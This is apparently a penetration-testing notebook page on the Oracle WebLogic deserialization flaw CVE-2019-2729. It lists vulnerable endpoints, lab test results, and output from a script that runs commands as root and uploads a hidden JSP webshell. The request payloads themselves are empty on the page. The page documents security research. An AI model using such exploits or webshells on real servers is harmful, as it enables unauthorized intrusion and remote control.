0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Golang
      • mholt/archiver
        • CVE-2024-0406
        • CVE-2025-3445
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Node
      • markdown-pdf - CVE-2023-0835
      • sanitize-html - CVE-2024-21501
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page
  • Vulnerable endpoints
  • Test data
  • Scripts

Was this helpful?

  1. Exploits / PoC's
  2. Oracle

WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0

Vulnerable endpoints

## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService

Test data

Version
Image
Result
Reason

10.3.6.0

Vulnerable

wls-wsat deserialization

12.2.1.3

Not vulnerable

Endpoints missing

12.2.1.3

Not vulnerable

Endpoints missing

12.2.1.3

Inconclusive

"Old format work area header is disabled."

Request 01, RCE on version 10.3.6.0:

Request 02, designed for version 10.2.7.1, RCE on 10.3.6.0:

Request 03, designed for version 10.3.6.0, RCE on 10.3.6.0:

Request 04, designed for version 10.3.6.2, RCE on 10.3.6.0:

Request 05, designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.

Scripts

weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.

» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root

As there are few public exploits using the /_async/ endpoint, I've modified rootedshells script to only upload a webshell and allow direct command execution. The script can be found here.

Last updated 8 months ago

Was this helpful?

VulnHub 10.3.6.0-2017
VulnHub 12.2.1.3-2018
VulnHub 12.2.1.3
weblogic:12.2.1.3